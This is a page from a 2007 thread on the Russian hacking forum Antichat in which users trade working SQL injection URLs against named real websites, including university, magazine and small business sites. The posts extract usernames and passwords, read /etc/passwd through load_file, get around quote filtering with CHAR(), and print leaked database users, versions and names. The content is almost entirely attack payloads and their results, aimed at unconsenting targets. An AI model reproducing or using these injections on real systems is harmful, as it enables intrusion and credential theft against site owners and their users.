ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3131  
Старый 22.09.2007, 03:38
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

"раскрутил" скулю Slider'a "попроще"
сразу говорю сорри, когда раскручивал не видел что слайдер сам уже раскрутил..
Код:
http://anime.kz/index.html?mode=links&pid=6+UNION+SELECT+1,login,3,4,pwd,6,7+from+user/*
+ своя:

Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,password+from+users/*
пароль, логин - ненашёл
Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=users+limit+0,1/*
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+0,1/*

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
 
Ответить с цитированием

  #3132  
Старый 22.09.2007, 05:36
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

2BlackCats

Код:
http://www.borytucholskie.pl/index.php?id=-1+union+select+1,column_name+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME=CHAR(117,115,101,114,115)+limit+1,1/*
кавычки фильтруются
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #3133  
Старый 22.09.2007, 06:14
Sutted
Banned
Регистрация: 16.09.2007
Сообщений: 15
Провел на форуме:
12361

Репутация: 1
По умолчанию

Scipio, хм, я не пойму как вы из этого извлекаете логин и пароль? У меня вот появилось в середине страницы:
Цитата:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /index.php on line 10
А как из этого пользу извлечь не пойму( объясни плз.
 
Ответить с цитированием

  #3134  
Старый 22.09.2007, 11:05
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию

http://theboard.byu.edu/
Код:
http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+version(),user(),concat_ws(0x3a,username,user_password),4,database(),6,7,8,0x6865617679206D6574616C203A44,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+100Hrbb_users+limit+1,1
http://theboard.byu.edu/index.php?area=viewall&id=-1+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables
http://primes.utm.edu
Код:
http://primes.utm.edu/bios/page.php?id=&username=sdf%27+union+select+concat_ws(0x203a20,username,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,2,2,2,2,2,2,2,2,2,2,2,2,2+FROM+person+limit+1,1/*
http://hitl.washington.edu (Postgre 8 без прав, лениво ковырять)
Код:
http://www.hitl.washington.edu/people/papers.php?name=jksdelly'+union+select+relname,null,null+from+pg_class+where+relname%3C%3E'alum_person'+and+relname%3C%3E'alum_person_alumid_seq'+and+relname%3C%3E'alum_position'+and+''='
 
Ответить с цитированием

  #3135  
Старый 22.09.2007, 16:16
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию

Код:
http://www.northberwickuk.com/info.php?id=-1+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/*&catid=324&f=NorthBerwick&type=featured
Код:
http://www.kinogalerija.lv/info.php?id=-1+union+select+version(),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Последний раз редактировалось z01b; 22.09.2007 в 16:23..
 
Ответить с цитированием

  #3136  
Старый 22.09.2007, 16:51
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://admiral.delfi.lv/index.php?id=-48390++union+select+1,table_name,3+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
 
Ответить с цитированием

  #3137  
Старый 22.09.2007, 16:51
z01b
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904

Репутация: 1393


По умолчанию

Код:
http://www.ability.nl/info.php?ID=-1+union+select+0,2,version()/*
 
Ответить с цитированием

  #3138  
Старый 22.09.2007, 16:57
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
htp://www.erikdevlieger.com/kunst.php?rq=list&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*  imcavas_erik@ws04.hosting.nl:4.1.21-log:imcavas_erikdevlieger
Код:
http://www.spcompanyspb.com/goods.php?type=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*&style=5  u7821@localhost:5.0.24-Debian_1-log:u7821: цензуро =\
Код:
  http://www.fenixbel.com/site.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*  merkator_2222@v62.valuehost.ru:5.0.45-log:merkator_2222
 
Ответить с цитированием

  #3139  
Старый 22.09.2007, 16:58
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://www.tolkien.it/catalogo/item.asp?ID=1+or+1=(SELECT+TOP+1+passw+from+Tadmins+where+username='roby')--
 
Ответить с цитированием

  #3140  
Старый 22.09.2007, 17:04
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286

Репутация: 728
Talking

www.chip.ua - сайт журнала CHIP

Код:
http://www.chip.ua/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Скуль так розкрутить не удалось =\

P.S: _http://www.ichip.ru/?page=poll&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
тот же результат =)

Последний раз редактировалось _-Ramos-_; 22.09.2007 в 17:19..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ